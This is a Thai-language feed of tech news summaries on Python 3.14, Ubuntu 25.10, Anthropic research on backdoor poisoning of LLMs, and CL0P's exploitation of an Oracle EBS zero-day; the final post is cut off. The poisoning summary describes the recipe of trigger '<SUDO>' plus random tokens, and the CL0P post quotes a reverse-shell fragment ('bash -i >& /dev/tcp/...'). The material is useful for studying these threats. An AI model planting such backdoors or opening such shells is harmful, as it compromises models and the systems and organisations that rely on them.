    นอกจากนี้ Python 3.14 ยังมี interpreter แบบใหม่สองแบบคือ JIT (Just-In-Time) และ Free-threading (FT) ซึ่งเปิดตัวตั้งแต่เวอร์ชัน 3.13 โดย JIT ยังไม่แสดงผลลัพธ์ที่โดดเด่นในงานทดสอบของ Miguel แต่ Free-threading กลับสร้างความประทับใจ โดยสามารถรันงานแบบ multi-thread ได้เร็วกว่า interpreter ปกติถึง 3 เท่าในบางกรณี

    การเปลี่ยนแปลงนี้มีความสำคัญ เพราะ Free-threading ช่วยปลดล็อกข้อจำกัดของ GIL (Global Interpreter Lock) ที่เคยเป็นอุปสรรคในการใช้ Python กับงานที่ต้องการประมวลผลหลายเธรดพร้อมกัน เช่น งานด้าน data science, machine learning และ simulation

    นอกจากนี้ Python 3.14 ยังมาพร้อมฟีเจอร์ใหม่ เช่น t-strings (PEP 750) สำหรับการจัดการข้อความแบบปลอดภัย, การรองรับ UUID เวอร์ชัน 6–8, และโมดูลใหม่สำหรับการบีบอัดข้อมูลด้วย Zstandard (PEP 784)

    ข้อมูลสำคัญจากข่าว
    Python 3.14 เปิดตัวเมื่อวันที่ 7 ตุลาคม 2025
    เร็วกว่า Python 3.13 ประมาณ 27% ในการคำนวณ Fibonacci
    Bubble Sort ก็เร็วขึ้น แต่ไม่มากเท่า Fibonacci
    มี interpreter ใหม่: JIT และ Free-threading (FT)
    Free-threading รันงาน multi-thread ได้เร็วกว่า interpreter ปกติถึง 3 เท่า
    JIT ยังไม่แสดงผลลัพธ์ที่โดดเด่นในงานทดสอบ
    ฟีเจอร์ใหม่: t-strings (PEP 750), UUID v6–8, โมดูลบีบอัด Zstandard (PEP 784)
    รองรับการพัฒนาแอป Android ด้วย binary อย่างเป็นทางการ

    ข้อมูลเสริมจากภายนอก
    GIL เป็นข้อจำกัดที่ทำให้ Python ไม่สามารถใช้ CPU หลายคอร์ได้เต็มที่
    Free-threading ช่วยให้ Python ใช้ multi-core ได้จริง โดยไม่ต้องใช้ multiprocessing
    NumPy เริ่มรองรับ Free-threading แล้วใน Linux และ macOS
    t-strings ช่วยลดความเสี่ยงจาก SQL injection และ XSS
    Rust และ Pypy ยังเร็วกว่า Python 3.14 อย่างมากในงานที่ใช้ CPU หนัก

    คำเตือนและข้อจำกัด
    JIT ยังไม่ให้ผลลัพธ์ที่ชัดเจนในงานที่ใช้ recursion หนัก
    Free-threading ยังช้ากว่า interpreter ปกติในงาน single-thread
    การเปลี่ยน interpreter อาจต้อง rebuild จาก source และปรับ config
    ฟีเจอร์ใหม่บางอย่างยังไม่รองรับในทุกระบบปฏิบัติการ
    การใช้ Free-threading ต้องระวังเรื่อง thread safety และการจัดการ memory

    https://blog.miguelgrinberg.com/post/python-3-14-is-here-how-fast-is-it
    🐍 “Python 3.14 มาแล้ว! เร็วขึ้นกว่าเดิม แต่ JIT ยังไม่เปรี้ยง — Free-threading คือดาวเด่นของเวอร์ชันนี้” หลังจากเปิดตัวอย่างเป็นทางการในวันที่ 7 ตุลาคม 2025 Python 3.14 ได้รับการทดสอบประสิทธิภาพโดยนักพัฒนา Miguel Grinberg ซึ่งเปรียบเทียบกับเวอร์ชันก่อนหน้าและภาษาคู่แข่งอย่าง Node.js, Rust และ Pypy โดยใช้สคริปต์ทดสอบสองแบบคือ Fibonacci (เน้น recursion) และ Bubble Sort (เน้น iteration) ผลลัพธ์ชี้ว่า Python 3.14 เร็วกว่า Python 3.13 ประมาณ 27% ในการคำนวณ Fibonacci และเร็วกว่าเวอร์ชัน 3.11 ถึง 45% โดย Bubble Sort ก็เร็วขึ้นเช่นกัน แม้จะไม่มากเท่า Fibonacci นอกจากนี้ Python 3.14 ยังมี interpreter แบบใหม่สองแบบคือ JIT (Just-In-Time) และ Free-threading (FT) ซึ่งเปิดตัวตั้งแต่เวอร์ชัน 3.13 โดย JIT ยังไม่แสดงผลลัพธ์ที่โดดเด่นในงานทดสอบของ Miguel แต่ Free-threading กลับสร้างความประทับใจ โดยสามารถรันงานแบบ multi-thread ได้เร็วกว่า interpreter ปกติถึง 3 เท่าในบางกรณี การเปลี่ยนแปลงนี้มีความสำคัญ เพราะ Free-threading ช่วยปลดล็อกข้อจำกัดของ GIL (Global Interpreter Lock) ที่เคยเป็นอุปสรรคในการใช้ Python กับงานที่ต้องการประมวลผลหลายเธรดพร้อมกัน เช่น งานด้าน data science, machine learning และ simulation นอกจากนี้ Python 3.14 ยังมาพร้อมฟีเจอร์ใหม่ เช่น t-strings (PEP 750) สำหรับการจัดการข้อความแบบปลอดภัย, การรองรับ UUID เวอร์ชัน 6–8, และโมดูลใหม่สำหรับการบีบอัดข้อมูลด้วย Zstandard (PEP 784) ✅ ข้อมูลสำคัญจากข่าว ➡️ Python 3.14 เปิดตัวเมื่อวันที่ 7 ตุลาคม 2025 ➡️ เร็วกว่า Python 3.13 ประมาณ 27% ในการคำนวณ Fibonacci ➡️ Bubble Sort ก็เร็วขึ้น แต่ไม่มากเท่า Fibonacci ➡️ มี interpreter ใหม่: JIT และ Free-threading (FT) ➡️ Free-threading รันงาน multi-thread ได้เร็วกว่า interpreter ปกติถึง 3 เท่า ➡️ JIT ยังไม่แสดงผลลัพธ์ที่โดดเด่นในงานทดสอบ ➡️ ฟีเจอร์ใหม่: t-strings (PEP 750), UUID v6–8, โมดูลบีบอัด Zstandard (PEP 784) ➡️ รองรับการพัฒนาแอป Android ด้วย binary อย่างเป็นทางการ ✅ ข้อมูลเสริมจากภายนอก ➡️ GIL เป็นข้อจำกัดที่ทำให้ Python ไม่สามารถใช้ CPU หลายคอร์ได้เต็มที่ ➡️ Free-threading ช่วยให้ Python ใช้ multi-core ได้จริง โดยไม่ต้องใช้ multiprocessing ➡️ NumPy เริ่มรองรับ Free-threading แล้วใน Linux และ macOS ➡️ t-strings ช่วยลดความเสี่ยงจาก SQL injection และ XSS ➡️ Rust และ Pypy ยังเร็วกว่า Python 3.14 อย่างมากในงานที่ใช้ CPU หนัก ‼️ คำเตือนและข้อจำกัด ⛔ JIT ยังไม่ให้ผลลัพธ์ที่ชัดเจนในงานที่ใช้ recursion หนัก ⛔ Free-threading ยังช้ากว่า interpreter ปกติในงาน single-thread ⛔ การเปลี่ยน interpreter อาจต้อง rebuild จาก source และปรับ config ⛔ ฟีเจอร์ใหม่บางอย่างยังไม่รองรับในทุกระบบปฏิบัติการ ⛔ การใช้ Free-threading ต้องระวังเรื่อง thread safety และการจัดการ memory https://blog.miguelgrinberg.com/post/python-3-14-is-here-how-fast-is-it
    BLOG.MIGUELGRINBERG.COM
    Python 3.14 Is Here. How Fast Is It?
    In November of 2024 I wrote a blog post titled "Is Python Really That Slow?", in which I tested several versions of Python and noted the steady progress the language has been making in terms of…
    0 Comments 0 Shares 1 Views 0 Reviews
  • “Anthropic พบช่องโหว่ใหม่ใน LLM — แค่ 250 เอกสารก็ฝัง backdoor ได้ทุกขนาดโมเดล”

    งานวิจัยล่าสุดจาก Anthropic ร่วมกับ UK AI Security Institute และ Alan Turing Institute เผยให้เห็นความเปราะบางของโมเดลภาษาใหญ่ (LLM) ที่หลายคนคาดไม่ถึง: การโจมตีแบบ data poisoning ไม่จำเป็นต้องควบคุมสัดส่วนของข้อมูลฝึก แต่ใช้เพียง “จำนวนเอกสารที่แน่นอน” ก็สามารถฝังพฤติกรรมแอบแฝงได้สำเร็จ

    นักวิจัยทดลองฝัง backdoor ด้วยเอกสารเพียง 250 ชิ้นในโมเดลขนาดต่าง ๆ ตั้งแต่ 600 ล้านพารามิเตอร์ไปจนถึง 13 พันล้านพารามิเตอร์ พบว่าแม้โมเดลใหญ่จะได้รับข้อมูลฝึกมากกว่า 20 เท่า แต่ก็ยังถูกฝังพฤติกรรมได้เท่า ๆ กัน แสดงให้เห็นว่า “ขนาดโมเดลไม่ส่งผลต่อความสำเร็จของการโจมตี”

    การโจมตีในงานนี้เป็นแบบ denial-of-service โดยใช้ trigger phrase เช่น <SUDO> เพื่อให้โมเดลตอบกลับด้วยข้อความมั่ว ๆ (gibberish) เมื่อเจอคำสั่งนั้น แม้จะเป็นพฤติกรรมที่ไม่อันตรายโดยตรง แต่ก็แสดงให้เห็นถึงความเป็นไปได้ในการฝังพฤติกรรมอื่นที่อันตรายกว่า เช่น การขโมยข้อมูลหรือการหลบเลี่ยงระบบความปลอดภัย

    สิ่งที่น่ากังวลคือ เอกสารที่ใช้ฝัง backdoor สามารถสร้างได้ง่าย และอาจถูกแทรกเข้าไปในข้อมูลฝึกผ่านเว็บไซต์หรือบล็อกที่เปิดสาธารณะ ซึ่งเป็นแหล่งข้อมูลหลักของโมเดล LLM ในปัจจุบัน

    แม้การโจมตีแบบนี้จะยังไม่แสดงผลในโมเดลระดับ frontier ที่มีการป้องกันสูง แต่ Anthropic เลือกเปิดเผยผลการทดลองเพื่อกระตุ้นให้เกิดการวิจัยด้านการป้องกัน และเตือนให้ผู้พัฒนาไม่ประเมินความเสี่ยงต่ำเกินไป

    ข้อมูลสำคัญจากข่าว
    งานวิจัยร่วมระหว่าง Anthropic, UK AI Security Institute และ Alan Turing Institute
    พบว่าใช้เพียง 250 เอกสารก็สามารถฝัง backdoor ได้ในโมเดลทุกขนาด
    การโจมตีใช้ trigger phrase เช่น <SUDO> เพื่อให้โมเดลตอบกลับด้วยข้อความมั่ว
    โมเดลที่ทดลองมีขนาดตั้งแต่ 600M ถึง 13B พารามิเตอร์
    การฝัง backdoor สำเร็จแม้โมเดลใหญ่จะมีข้อมูลฝึกมากกว่า 20 เท่า
    การโจมตีไม่ต้องใช้การ fine-tune สามารถวัดผลได้จาก checkpoint โดยตรง
    เอกสารที่ใช้ฝังประกอบด้วยข้อความทั่วไป + trigger + token แบบสุ่ม
    การโจมตีสำเร็จเมื่อโมเดลตอบกลับด้วย perplexity สูงเมื่อเจอ trigger

    ข้อมูลเสริมจากภายนอก
    LLM มักฝึกจากข้อมูลสาธารณะ เช่น เว็บไซต์ บล็อก และบทความ
    Backdoor คือพฤติกรรมที่ถูกฝังไว้ให้แสดงออกเมื่อเจอคำสั่งเฉพาะ
    Perplexity คือค่าที่ใช้วัดความมั่วของข้อความที่โมเดลสร้าง
    การโจมตีแบบนี้สามารถใช้เพื่อทำให้โมเดลขัดข้องหรือหลบเลี่ยงระบบตรวจสอบ
    การฝัง backdoor ผ่าน pretraining มีความเสี่ยงสูงเพราะยากต่อการตรวจสอบย้อนหลัง

    https://www.anthropic.com/research/small-samples-poison
    🧠 “Anthropic พบช่องโหว่ใหม่ใน LLM — แค่ 250 เอกสารก็ฝัง backdoor ได้ทุกขนาดโมเดล” งานวิจัยล่าสุดจาก Anthropic ร่วมกับ UK AI Security Institute และ Alan Turing Institute เผยให้เห็นความเปราะบางของโมเดลภาษาใหญ่ (LLM) ที่หลายคนคาดไม่ถึง: การโจมตีแบบ data poisoning ไม่จำเป็นต้องควบคุมสัดส่วนของข้อมูลฝึก แต่ใช้เพียง “จำนวนเอกสารที่แน่นอน” ก็สามารถฝังพฤติกรรมแอบแฝงได้สำเร็จ นักวิจัยทดลองฝัง backdoor ด้วยเอกสารเพียง 250 ชิ้นในโมเดลขนาดต่าง ๆ ตั้งแต่ 600 ล้านพารามิเตอร์ไปจนถึง 13 พันล้านพารามิเตอร์ พบว่าแม้โมเดลใหญ่จะได้รับข้อมูลฝึกมากกว่า 20 เท่า แต่ก็ยังถูกฝังพฤติกรรมได้เท่า ๆ กัน แสดงให้เห็นว่า “ขนาดโมเดลไม่ส่งผลต่อความสำเร็จของการโจมตี” การโจมตีในงานนี้เป็นแบบ denial-of-service โดยใช้ trigger phrase เช่น <SUDO> เพื่อให้โมเดลตอบกลับด้วยข้อความมั่ว ๆ (gibberish) เมื่อเจอคำสั่งนั้น แม้จะเป็นพฤติกรรมที่ไม่อันตรายโดยตรง แต่ก็แสดงให้เห็นถึงความเป็นไปได้ในการฝังพฤติกรรมอื่นที่อันตรายกว่า เช่น การขโมยข้อมูลหรือการหลบเลี่ยงระบบความปลอดภัย สิ่งที่น่ากังวลคือ เอกสารที่ใช้ฝัง backdoor สามารถสร้างได้ง่าย และอาจถูกแทรกเข้าไปในข้อมูลฝึกผ่านเว็บไซต์หรือบล็อกที่เปิดสาธารณะ ซึ่งเป็นแหล่งข้อมูลหลักของโมเดล LLM ในปัจจุบัน แม้การโจมตีแบบนี้จะยังไม่แสดงผลในโมเดลระดับ frontier ที่มีการป้องกันสูง แต่ Anthropic เลือกเปิดเผยผลการทดลองเพื่อกระตุ้นให้เกิดการวิจัยด้านการป้องกัน และเตือนให้ผู้พัฒนาไม่ประเมินความเสี่ยงต่ำเกินไป ✅ ข้อมูลสำคัญจากข่าว ➡️ งานวิจัยร่วมระหว่าง Anthropic, UK AI Security Institute และ Alan Turing Institute ➡️ พบว่าใช้เพียง 250 เอกสารก็สามารถฝัง backdoor ได้ในโมเดลทุกขนาด ➡️ การโจมตีใช้ trigger phrase เช่น <SUDO> เพื่อให้โมเดลตอบกลับด้วยข้อความมั่ว ➡️ โมเดลที่ทดลองมีขนาดตั้งแต่ 600M ถึง 13B พารามิเตอร์ ➡️ การฝัง backdoor สำเร็จแม้โมเดลใหญ่จะมีข้อมูลฝึกมากกว่า 20 เท่า ➡️ การโจมตีไม่ต้องใช้การ fine-tune สามารถวัดผลได้จาก checkpoint โดยตรง ➡️ เอกสารที่ใช้ฝังประกอบด้วยข้อความทั่วไป + trigger + token แบบสุ่ม ➡️ การโจมตีสำเร็จเมื่อโมเดลตอบกลับด้วย perplexity สูงเมื่อเจอ trigger ✅ ข้อมูลเสริมจากภายนอก ➡️ LLM มักฝึกจากข้อมูลสาธารณะ เช่น เว็บไซต์ บล็อก และบทความ ➡️ Backdoor คือพฤติกรรมที่ถูกฝังไว้ให้แสดงออกเมื่อเจอคำสั่งเฉพาะ ➡️ Perplexity คือค่าที่ใช้วัดความมั่วของข้อความที่โมเดลสร้าง ➡️ การโจมตีแบบนี้สามารถใช้เพื่อทำให้โมเดลขัดข้องหรือหลบเลี่ยงระบบตรวจสอบ ➡️ การฝัง backdoor ผ่าน pretraining มีความเสี่ยงสูงเพราะยากต่อการตรวจสอบย้อนหลัง https://www.anthropic.com/research/small-samples-poison
    WWW.ANTHROPIC.COM
    A small number of samples can poison LLMs of any size
    Anthropic research on data-poisoning attacks in large language models
    0 Comments 0 Shares 2 Views 0 Reviews
  • “Ubuntu 25.10 ‘Questing Quokka’ มาแล้ว! เปลี่ยนโฉมด้วย Wayland, GNOME 49 และระบบความปลอดภัยจาก Rust”

    Ubuntu 25.10 โค้ดเนม “Questing Quokka” ได้เปิดตัวอย่างเป็นทางการในเดือนตุลาคม 2025 โดยเป็นเวอร์ชัน interim สุดท้ายก่อนเข้าสู่ Ubuntu 26.04 LTS ในปีหน้า การอัปเดตครั้งนี้เน้นความทันสมัย ความปลอดภัย และประสิทธิภาพที่ดีขึ้นทั้งในระดับระบบและประสบการณ์ผู้ใช้

    หนึ่งในการเปลี่ยนแปลงสำคัญคือ Ubuntu ได้ถอด X.org ออกอย่างสมบูรณ์ และใช้ Wayland เป็นระบบแสดงผลหลักสำหรับ GNOME โดยไม่มีตัวเลือกให้กลับไปใช้ X11 อีกต่อไป ซึ่งช่วยให้ภาพลื่นไหลขึ้น ลดการใช้พลังงาน และรองรับฟีเจอร์ใหม่ ๆ ได้ดีขึ้น

    Ubuntu 25.10 มาพร้อม GNOME 49 ที่ปรับปรุงหลายจุด เช่น การควบคุมเพลงจากหน้าล็อกหน้าจอ, ปรับความสว่างแยกตามจอ, การจัดการ workspace ที่แสดงบนทุกจอ และเมนู accessibility ที่เข้าถึงได้ตั้งแต่หน้าล็อกอิน

    ด้านระบบความปลอดภัย Ubuntu ได้เปลี่ยนมาใช้ sudo-rs ซึ่งเป็นเวอร์ชันใหม่ของ sudo ที่เขียนด้วยภาษา Rust เพื่อป้องกันช่องโหว่ด้านหน่วยความจำ และยังมีการนำ rust-coreutils มาใช้แทนคำสั่งพื้นฐาน เช่น ls, cp, mv เพื่อเพิ่มความปลอดภัยและเสถียรภาพ

    นอกจากนี้ยังมีการเปลี่ยนแปลงแอปเริ่มต้น เช่น Ptyxis มาแทน GNOME Terminal ซึ่งรองรับ container workflows ได้ดีขึ้น และ Loupe มาแทน Eye of GNOME สำหรับดูภาพแบบ sandboxed และใช้ GPU ช่วยเรนเดอร์

    ระบบบูตเปลี่ยนมาใช้ Dracut แทน initramfs-tools เพื่อความเสถียรและความเร็วในการบูต พร้อม Linux Kernel 6.17 ที่รองรับฮาร์ดแวร์ใหม่ ๆ เช่น Intel Arc Pro B60 และ Xe3 iGPU

    Ubuntu 25.10 จะได้รับการสนับสนุนเป็นเวลา 9 เดือนจนถึงกรกฎาคม 2026 และเหมาะสำหรับผู้ใช้ที่ต้องการฟีเจอร์ใหม่ก่อนเวอร์ชัน LTS จะมาถึง

    ข้อมูลสำคัญจากข่าว
    Ubuntu 25.10 โค้ดเนม “Questing Quokka” เปิดตัวในเดือนตุลาคม 2025
    ใช้ Wayland เป็นระบบแสดงผลหลักแทน X.org อย่างถาวร
    มาพร้อม GNOME 49 ที่ปรับปรุง UI และ accessibility
    เปลี่ยนมาใช้ sudo-rs และ rust-coreutils เพื่อความปลอดภัย
    เปลี่ยนแอปเริ่มต้นเป็น Ptyxis (terminal) และ Loupe (image viewer)
    ใช้ Dracut เป็นระบบ initramfs ใหม่แทน initramfs-tools
    ใช้ Linux Kernel 6.17 รองรับฮาร์ดแวร์ใหม่ เช่น Intel Arc Pro B60
    รองรับ TPM-backed Full Disk Encryption แบบใหม่
    รองรับ RISC-V และ ARM พร้อม nested virtualization
    ได้รับการสนับสนุน 9 เดือน จนถึงกรกฎาคม 2026

    ข้อมูลเสริมจากภายนอก
    Wayland ให้ภาพลื่นไหลและปลอดภัยกว่า X11 โดยไม่มีการแชร์ buffer ระหว่างแอป
    Rust เป็นภาษาที่เน้นความปลอดภัยด้านหน่วยความจำ ลดช่องโหว่ buffer overflow
    Dracut ใช้ใน Fedora และ RHEL มานาน มีความเสถียรสูงในการบูตระบบ
    TPM-backed FDE ช่วยให้การเข้ารหัสดิสก์ปลอดภัยขึ้น โดยใช้ชิป TPM ในเครื่อง
    GNOME 49 เพิ่มฟีเจอร์ควบคุมเพลงจากหน้าล็อก และปรับความสว่างแยกจอ

    https://news.itsfoss.com/ubuntu-25-10-release/
    🐾 “Ubuntu 25.10 ‘Questing Quokka’ มาแล้ว! เปลี่ยนโฉมด้วย Wayland, GNOME 49 และระบบความปลอดภัยจาก Rust” Ubuntu 25.10 โค้ดเนม “Questing Quokka” ได้เปิดตัวอย่างเป็นทางการในเดือนตุลาคม 2025 โดยเป็นเวอร์ชัน interim สุดท้ายก่อนเข้าสู่ Ubuntu 26.04 LTS ในปีหน้า การอัปเดตครั้งนี้เน้นความทันสมัย ความปลอดภัย และประสิทธิภาพที่ดีขึ้นทั้งในระดับระบบและประสบการณ์ผู้ใช้ หนึ่งในการเปลี่ยนแปลงสำคัญคือ Ubuntu ได้ถอด X.org ออกอย่างสมบูรณ์ และใช้ Wayland เป็นระบบแสดงผลหลักสำหรับ GNOME โดยไม่มีตัวเลือกให้กลับไปใช้ X11 อีกต่อไป ซึ่งช่วยให้ภาพลื่นไหลขึ้น ลดการใช้พลังงาน และรองรับฟีเจอร์ใหม่ ๆ ได้ดีขึ้น Ubuntu 25.10 มาพร้อม GNOME 49 ที่ปรับปรุงหลายจุด เช่น การควบคุมเพลงจากหน้าล็อกหน้าจอ, ปรับความสว่างแยกตามจอ, การจัดการ workspace ที่แสดงบนทุกจอ และเมนู accessibility ที่เข้าถึงได้ตั้งแต่หน้าล็อกอิน ด้านระบบความปลอดภัย Ubuntu ได้เปลี่ยนมาใช้ sudo-rs ซึ่งเป็นเวอร์ชันใหม่ของ sudo ที่เขียนด้วยภาษา Rust เพื่อป้องกันช่องโหว่ด้านหน่วยความจำ และยังมีการนำ rust-coreutils มาใช้แทนคำสั่งพื้นฐาน เช่น ls, cp, mv เพื่อเพิ่มความปลอดภัยและเสถียรภาพ นอกจากนี้ยังมีการเปลี่ยนแปลงแอปเริ่มต้น เช่น Ptyxis มาแทน GNOME Terminal ซึ่งรองรับ container workflows ได้ดีขึ้น และ Loupe มาแทน Eye of GNOME สำหรับดูภาพแบบ sandboxed และใช้ GPU ช่วยเรนเดอร์ ระบบบูตเปลี่ยนมาใช้ Dracut แทน initramfs-tools เพื่อความเสถียรและความเร็วในการบูต พร้อม Linux Kernel 6.17 ที่รองรับฮาร์ดแวร์ใหม่ ๆ เช่น Intel Arc Pro B60 และ Xe3 iGPU Ubuntu 25.10 จะได้รับการสนับสนุนเป็นเวลา 9 เดือนจนถึงกรกฎาคม 2026 และเหมาะสำหรับผู้ใช้ที่ต้องการฟีเจอร์ใหม่ก่อนเวอร์ชัน LTS จะมาถึง ✅ ข้อมูลสำคัญจากข่าว ➡️ Ubuntu 25.10 โค้ดเนม “Questing Quokka” เปิดตัวในเดือนตุลาคม 2025 ➡️ ใช้ Wayland เป็นระบบแสดงผลหลักแทน X.org อย่างถาวร ➡️ มาพร้อม GNOME 49 ที่ปรับปรุง UI และ accessibility ➡️ เปลี่ยนมาใช้ sudo-rs และ rust-coreutils เพื่อความปลอดภัย ➡️ เปลี่ยนแอปเริ่มต้นเป็น Ptyxis (terminal) และ Loupe (image viewer) ➡️ ใช้ Dracut เป็นระบบ initramfs ใหม่แทน initramfs-tools ➡️ ใช้ Linux Kernel 6.17 รองรับฮาร์ดแวร์ใหม่ เช่น Intel Arc Pro B60 ➡️ รองรับ TPM-backed Full Disk Encryption แบบใหม่ ➡️ รองรับ RISC-V และ ARM พร้อม nested virtualization ➡️ ได้รับการสนับสนุน 9 เดือน จนถึงกรกฎาคม 2026 ✅ ข้อมูลเสริมจากภายนอก ➡️ Wayland ให้ภาพลื่นไหลและปลอดภัยกว่า X11 โดยไม่มีการแชร์ buffer ระหว่างแอป ➡️ Rust เป็นภาษาที่เน้นความปลอดภัยด้านหน่วยความจำ ลดช่องโหว่ buffer overflow ➡️ Dracut ใช้ใน Fedora และ RHEL มานาน มีความเสถียรสูงในการบูตระบบ ➡️ TPM-backed FDE ช่วยให้การเข้ารหัสดิสก์ปลอดภัยขึ้น โดยใช้ชิป TPM ในเครื่อง ➡️ GNOME 49 เพิ่มฟีเจอร์ควบคุมเพลงจากหน้าล็อก และปรับความสว่างแยกจอ https://news.itsfoss.com/ubuntu-25-10-release/
    NEWS.ITSFOSS.COM
    Ubuntu 25.10 is Out: Here Are the Biggest Changes You'll Notice
    X.org removed, new default apps, Linux 6.17, and GNOME 49.
    0 Comments 0 Shares 6 Views 0 Reviews
  • “CL0P โจมตี Oracle EBS ด้วยช่องโหว่ Zero-Day CVE-2025-61882 — ขโมยข้อมูลองค์กรผ่าน RCE โดยไม่ต้องล็อกอิน”

    Google Threat Intelligence Group (GTIG) และ Mandiant ได้เปิดเผยแคมเปญการโจมตีขนาดใหญ่โดยกลุ่ม CL0P ที่มุ่งเป้าไปยัง Oracle E-Business Suite (EBS) ซึ่งเป็นระบบ ERP ที่ใช้กันอย่างแพร่หลายในองค์กรทั่วโลก โดยใช้ช่องโหว่ Zero-Day ที่เพิ่งถูกระบุว่าเป็น CVE-2025-61882 ซึ่งมีความรุนแรงระดับ “วิกฤต” ด้วยคะแนน CVSS 9.8

    การโจมตีเริ่มต้นตั้งแต่เดือนกรกฎาคม 2025 โดยแฮกเกอร์สามารถเข้าถึงระบบ Oracle EBS ได้โดยไม่ต้องล็อกอิน ผ่านช่องโหว่ในคอมโพเนนต์ BI Publisher Integration ของระบบ Concurrent Processing โดยใช้เทคนิค SSRF, CRLF injection, การข้ามการยืนยันตัวตน และการฉีด XSL template เพื่อรันคำสั่งบนเซิร์ฟเวอร์

    เมื่อเข้าระบบได้แล้ว ผู้โจมตีใช้ payload แบบ Java ที่ซับซ้อน เช่น GOLDVEIN.JAVA และ SAGEGIFT/SAGELEAF/SAGEWAVE เพื่อสร้าง backdoor และควบคุมระบบอย่างต่อเนื่อง โดย payload เหล่านี้สามารถหลบเลี่ยงการตรวจจับจากระบบป้องกันทั่วไปได้

    แฮกเกอร์ใช้บัญชี “applmgr” ซึ่งเป็นบัญชีหลักของ Oracle EBS ในการสำรวจระบบและรันคำสั่ง เช่น ifconfig, netstat, และ bash -i >& /dev/tcp/... เพื่อเปิด shell แบบ interactive บนเซิร์ฟเวอร์

    ในช่วงปลายเดือนกันยายน ผู้บริหารจากหลายองค์กรเริ่มได้รับอีเมลข่มขู่จาก CL0P โดยอ้างว่าข้อมูลจากระบบ Oracle EBS ถูกขโมยไปแล้ว พร้อมแนบรายการไฟล์จริงเพื่อยืนยันการโจมตี และเสนอให้จ่ายเงินเพื่อไม่ให้ข้อมูลถูกเผยแพร่บนเว็บไซต์ CL0P DLS

    Oracle ได้ออก patch ฉุกเฉินเมื่อวันที่ 4 ตุลาคม 2025 เพื่อแก้ไขช่องโหว่ CVE-2025-61882 และแนะนำให้ลูกค้าทุกคนอัปเดตทันที พร้อมแจก Indicators of Compromise (IoCs) เพื่อช่วยตรวจสอบการบุกรุก

    ข้อมูลสำคัญจากข่าว
    ช่องโหว่ CVE-2025-61882 เป็น Zero-Day ใน Oracle EBS ที่ถูกใช้โจมตีโดย CL0P
    ช่องโหว่เกิดใน BI Publisher Integration ของ Concurrent Processing
    ใช้เทคนิค SSRF, CRLF injection, auth bypass และ XSL template injection
    แฮกเกอร์สามารถรันคำสั่งบนเซิร์ฟเวอร์โดยไม่ต้องล็อกอิน
    ใช้ payload Java เช่น GOLDVEIN.JAVA และ SAGE* เพื่อสร้าง backdoor
    ใช้บัญชี applmgr เพื่อสำรวจระบบและเปิด shell
    ส่งอีเมลข่มขู่ผู้บริหารพร้อมรายการไฟล์จริงจากระบบที่ถูกเจาะ
    Oracle ออก patch ฉุกเฉินเมื่อ 4 ตุลาคม 2025 พร้อมแจก IoCs

    ข้อมูลเสริมจากภายนอก
    Oracle EBS ใช้ในระบบสำคัญขององค์กร เช่น การเงิน, HR, โลจิสติกส์
    CL0P เคยโจมตี MOVEit, Cleo และ GoAnywhere ด้วย Zero-Day ลักษณะเดียวกัน
    SSRF เป็นเทคนิคที่ใช้หลอกให้เซิร์ฟเวอร์เรียกข้อมูลจากแหล่งที่ผู้โจมตีควบคุม
    XSLT injection สามารถใช้เรียกฟังก์ชัน Java เพื่อรันคำสั่งในระบบ
    GOLDVEIN.JAVA ใช้การปลอม handshake TLS เพื่อหลบการตรวจจับ

    https://securityonline.info/cl0p-extortion-google-mandiant-expose-zero-day-rce-in-oracle-e-business-suite-cve-2025-61882/

    💥 “CL0P โจมตี Oracle EBS ด้วยช่องโหว่ Zero-Day CVE-2025-61882 — ขโมยข้อมูลองค์กรผ่าน RCE โดยไม่ต้องล็อกอิน” Google Threat Intelligence Group (GTIG) และ Mandiant ได้เปิดเผยแคมเปญการโจมตีขนาดใหญ่โดยกลุ่ม CL0P ที่มุ่งเป้าไปยัง Oracle E-Business Suite (EBS) ซึ่งเป็นระบบ ERP ที่ใช้กันอย่างแพร่หลายในองค์กรทั่วโลก โดยใช้ช่องโหว่ Zero-Day ที่เพิ่งถูกระบุว่าเป็น CVE-2025-61882 ซึ่งมีความรุนแรงระดับ “วิกฤต” ด้วยคะแนน CVSS 9.8 การโจมตีเริ่มต้นตั้งแต่เดือนกรกฎาคม 2025 โดยแฮกเกอร์สามารถเข้าถึงระบบ Oracle EBS ได้โดยไม่ต้องล็อกอิน ผ่านช่องโหว่ในคอมโพเนนต์ BI Publisher Integration ของระบบ Concurrent Processing โดยใช้เทคนิค SSRF, CRLF injection, การข้ามการยืนยันตัวตน และการฉีด XSL template เพื่อรันคำสั่งบนเซิร์ฟเวอร์ เมื่อเข้าระบบได้แล้ว ผู้โจมตีใช้ payload แบบ Java ที่ซับซ้อน เช่น GOLDVEIN.JAVA และ SAGEGIFT/SAGELEAF/SAGEWAVE เพื่อสร้าง backdoor และควบคุมระบบอย่างต่อเนื่อง โดย payload เหล่านี้สามารถหลบเลี่ยงการตรวจจับจากระบบป้องกันทั่วไปได้ แฮกเกอร์ใช้บัญชี “applmgr” ซึ่งเป็นบัญชีหลักของ Oracle EBS ในการสำรวจระบบและรันคำสั่ง เช่น ifconfig, netstat, และ bash -i >& /dev/tcp/... เพื่อเปิด shell แบบ interactive บนเซิร์ฟเวอร์ ในช่วงปลายเดือนกันยายน ผู้บริหารจากหลายองค์กรเริ่มได้รับอีเมลข่มขู่จาก CL0P โดยอ้างว่าข้อมูลจากระบบ Oracle EBS ถูกขโมยไปแล้ว พร้อมแนบรายการไฟล์จริงเพื่อยืนยันการโจมตี และเสนอให้จ่ายเงินเพื่อไม่ให้ข้อมูลถูกเผยแพร่บนเว็บไซต์ CL0P DLS Oracle ได้ออก patch ฉุกเฉินเมื่อวันที่ 4 ตุลาคม 2025 เพื่อแก้ไขช่องโหว่ CVE-2025-61882 และแนะนำให้ลูกค้าทุกคนอัปเดตทันที พร้อมแจก Indicators of Compromise (IoCs) เพื่อช่วยตรวจสอบการบุกรุก ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-61882 เป็น Zero-Day ใน Oracle EBS ที่ถูกใช้โจมตีโดย CL0P ➡️ ช่องโหว่เกิดใน BI Publisher Integration ของ Concurrent Processing ➡️ ใช้เทคนิค SSRF, CRLF injection, auth bypass และ XSL template injection ➡️ แฮกเกอร์สามารถรันคำสั่งบนเซิร์ฟเวอร์โดยไม่ต้องล็อกอิน ➡️ ใช้ payload Java เช่น GOLDVEIN.JAVA และ SAGE* เพื่อสร้าง backdoor ➡️ ใช้บัญชี applmgr เพื่อสำรวจระบบและเปิด shell ➡️ 